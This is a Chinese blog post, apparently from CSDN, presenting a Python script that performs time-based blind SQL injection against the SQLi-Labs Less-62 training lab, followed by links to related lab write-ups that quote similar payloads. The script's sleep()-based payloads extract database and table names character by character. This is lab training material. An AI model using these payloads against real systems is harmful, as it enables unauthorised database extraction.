SQLi-Labs Less-62 python脚本

最新推荐文章于 2024-04-05 04:10:10 发布
最新推荐文章于 2024-04-05 04:10:10 发布
阅读量212 收藏 2
点赞数
分类专栏: 脚本 文章标签: web 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Liuzixuan0207/article/details/117262976
版权

SQLi-Labs Less-62 延时注入 python脚本

11/25/2020

雨 正常 乏

import requests
import datetime


class Bool_Sql_Inject(object):
 def __init__(self):
     self.url = "http://192.168.253.130/sql/Less-62/"

 def database_length(self):
     for i in range(1, 30):
         payload = self.url + "?id=1') and if(length(database())={},sleep(3),1)--+".format(i)

         time_start = datetime.datetime.now()

         print(payload)
         print("正在测试第" + str(i) + "位")

         response = requests.get(url=payload)

         time_end = datetime.datetime.now()

         t = (time_end - time_start).seconds

         if t >= 2:
             print('database length is ' + str(i))
             break
         else:
             pass

 def database_name(self):
     name = ''
     for j in range(1, 20):
         for i in '0123456789abcdefghijklmnopqrstuvwxyz':
             payload = self.url + "?id=1') and if(substr((select database()),{},1)='{}',sleep(3),1) --+".format(j, i)

             time_start = datetime.datetime.now()
             print(payload)
             print('正在测试第' + str(j) + '位')

             response = requests.get(url=payload)

             time_end = datetime.datetime.now()

             t = (time_end - time_start).seconds

             if t >= 3:
                 name += i
                 break
             else:
                 pass

     return name

 def table_count(self):
     for j in range(1, 30):
         payload = self.url + "?id=1') and if((select count(table_name) from information_schema.tables where table_schema\
         ='challenges')={},sleep(2),1) --+".format(j)

         time_start = datetime.datetime.now()

         response = requests.get(url=payload)

         time_end = datetime.datetime.now()

         t = (time_end - time_start).seconds

         if t >= 2:
             print('table count is ' + str(j))
             break

         else:
             pass

 def table_length(self):
     x = "0"
     one = Bool_Sql_Inject()
     database_name = one.database_name()
     for i in range(1, 20):
         payload = self.url + "?id=1') and if(length((select table_name from information_schema.tables where table_schema='{}' limit 0,1))={},sleep(3),1)--+".format(
             database_name, i)

         time_start = datetime.datetime.now()

         print(payload)
         print("正在测试第" + str(i) + "位")

         response = requests.get(url=payload)

         time_end = datetime.datetime.now()

         t = (time_end - time_start).seconds

         if t >= 3:
             print('table length is ' + str(i))
             break
         else:
             pass

     return database_name

 def table_name(self):
     one = Bool_Sql_Inject()
     database_name = one.database_name()
     name = ''
     for j in range(1, 20):
         for i in '0123456789abcdefghijklmnopqrstuvwxyz':
             payload = self.url + "?id=1') and if(substr((select table_name from information_schema.tables where table_schema='{}' limit 0,1),{},1)='{}',sleep(3),1) --+".format(
                 database_name, j, i)
             time_start = datetime.datetime.now()
             print(payload)
             print('正在测试第' + str(j) + '位')

             response = requests.get(url=payload)

             time_end = datetime.datetime.now()

             t = (time_end - time_start).seconds

             if t >= 3:
                 name += i
                 break
             else:
                 pass

     print(name)


start = Bool_Sql_Inject()
start.table_name()
sqli-labs Less - 62、63、64、65(sqli-labs闯关指南 62、63、64、65)
m0_54899775的博客
12-30 2008
sqli-labs Less - 62、63、64、65(sqli-labs闯关指南 62、63、64、65)
sqli-labs Less-1、Less-9\Less-15 python脚本
ChamZhiZe的博客
12-21 1336
虽然这个很简单,但是还是写个脚本跑一下 Less-1 from http.client import PROCESSING, responses from re import I, T from typing import FrozenSet from bs4.dammit import xml_encoding from bs4.element import ProcessingInstruction import requests import urllib.request from colorama
Sqli-labs less 62
weixin_34007291的博客
08-11 236
此处union和报错注入都已经失效了,那我们就要使用延时注入了,此处给出一个示例 payload: http://127.0.0.1/sqli-labs/Less-62/?id=1%27)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20ta...
Sqli-labsLess62-65
→_→
06-27 1045
Less-62 基于Bool_GET_单引号_小括号_字符型_盲注 先正常访问: 看到这个页面,猜测源码与58关类似,那么首先判断注入类型: ?id=1' ?id=1' -- # ?id=1" ?id=1"-- # ?id=1') ?id=1')-- # 经过测试发现:双引号正确回显,单引号和单引号加注释都没报错信息且没有正...
sqli-labs/Less-62
m0_71299382的博客
11-25 537
sqli-labs第六十二关
sqli-labsless62 GET -Challenge -Blind -130 queries allowed -Variation1 (GET型 挑战 盲注 只允许130次查询 变化1)...
ajxi63204的博客
01-31 234
允许130次尝试,然后是个盲注漏洞,看来要单字符猜解了 加单引号,页面异常,但报错被屏蔽了 http://192.168.136.128/sqli-labs-master/Less-62/?id=1' 加注释符,说明不止是用单引号闭合 http://192.168.136.128/sqli-labs-master/Less-62/?id=1'%23 ...
Python面试题大全SQLi第八关,Sqli-labs Less-8,Python知识总结
m0_60144796的博客
04-05 410
Python崛起并且风靡,因为优点多、应用领域广、被大牛们认可。学习 Python 门槛很低,但它的晋级路线很多,通过它你能进入机器学习、数据挖掘、大数据,CS等更加高级的领域。Python可以做网络应用,可以做科学计算,数据分析,可以做网络爬虫,可以做机器学习、自然语言处理、可以写游戏、可以做桌面应用…Python可以做的很多,你需要学好基础,再选择明确的方向。这里给大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
Python脚本中,我们使用requests库来发送POST请求,并使用headers和data参数来模拟登录请求。在获取数据库名时,我们可以使用循环来猜测数据库名的长度,并使用万能密码来确定数据库名的长度。最后,我们可以使用...
Sqli-labs靶场第21、22关详解[Sqli-labs-less-21、22]自动化注入-SQLmap工具注入|sqlmap跑base64加密
m0_73615178的博客
03-03 1284
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
sqli-labs Less-46、47、48、49(sqli-labs闯关指南 46、47、48、49)—order by 相关注入
m0_54899775的博客
12-28 1349
sqli-labs Less-46、47、48、49(sqli-labs闯关指南 46、47、48、49)—order by 相关注入
SQLi Labs实验指导书
11-02
SQLi Labs 通关过程 最好的文档,1-37课解答过程,言简意赅。大佬对不住,我把你的辛苦拿来换币了
sqli-labs (less-62)
kukudeshuo的博客
03-17 484
sqli-labs (less-62) 进入62关,输入 http://127.0.0.1/sql1/Less-62/?id=1 竟然发现会有130次机会,这里我们可以大胆猜想这里因为是Boolean盲注了,那么到底是不是呢,我们输入 http://127.0.0.1/sql1/Less-62/?id=1' 没有任何错误回显,这里我也尝试了union注入,但是显然也是不行的,所以我们只有使用Boolean盲注了 http://127.0.0.1/sql1/Less-62/?id=1'--+ #回显错
Sqli-labs less 64
weixin_33842304的博客
08-11 138
Less-64 此处的sql语句为 $sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1"; 示例payload: http://127.0.0.1/sqli-labs/Less-64/?id=1))and%20If(ascii(substr((select%20group_concat(table_name)%20fr...
sqli-labsLess62-65)布尔类型脚本
Bu2n的博客
02-06 1772
Less-62Less-63Less-64Less-65 Less-62 import requests from lxml import etree """ Less-62布尔类型爆破脚本 改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载 原理是按照payload循环字典,根据响应的长度,判断正确答案 """ url = 'http://192.168.31.242/sqli-labs/Less-62/' headers = {'referer.
[靶场] SQLi-Labs Less62-Less69
3hex的博客
10-28 645
66.Less62 请求方式 注入方式 备注 GET 盲注 130次语句以内完成 http://127.0.0.1:8003/Less-62/?id=1 http://127.0.0.1:8003/Less-62/?id=-1') or 1 --+ http://127.0.0.1:8003/Less-62/?id=-1') or (select 1)<0 --+ 67.Less63 请求方式 注入方式 备注 GET 盲注
(手工)【sqli-labs62-65】限制注入次数:盲注
07-16 767
【SQL-限制注入次数、盲注】
sqli-labs(54-65)终章
qq_43579362的博客
03-04 707
Page4終章以为会很难,结果就是限定注入次数,其他和前面一样,虽然很接近现实注入,但是还是可以采取一些手段来‘无限’注入,比如代理,脚本等。。。 Less-54~57 这4关都是使用联合查询注入,so easy。。。 Less-54 闭合方式:id=1'--+ Less-55 闭合方式:id=1)--+ Less-56 闭合方式:id=1')--+ Less-57 闭合方式:id="--+ Le...
sqli-labs————Less-60-65
Fly_鹏程万里
05-22 1081
Less-60payload:http://192.168.11.136/sqli-labs/Less-60?id=-1")union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0...
sqli-labs ---- Less-5 & Less-6
Nixawk
05-31 3026
在过去的日子里,我们利用https://github.com/Audi-1/sqli-labs,讨论了SQL注入的不同类型。最新发布的内容见地址。 现在,我们将回顾之前的SQL注入内容,并讨论基于错误显示的二阶查询注入,有时候又称子查询注入。有些人喜欢称其为盲注,但是我喜欢称其为显错注入,因为接下来我们会通过错误来获取信息。接下来的内容会如第一部分那样,继续采用分类方案,接下来的内容会以
sqli-labs Less-5盲注脚本
最新发布
01-18
### 关于 sqli-labsLess-5 的盲注攻击 在 `sqli-labs` 实验室中的 Less-5 部分涉及到了基于布尔的盲注 SQL 注入。这种类型的注入通过向应用程序发送特定构造的查询来推断数据库的内容,而不会使错误消息显示给...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值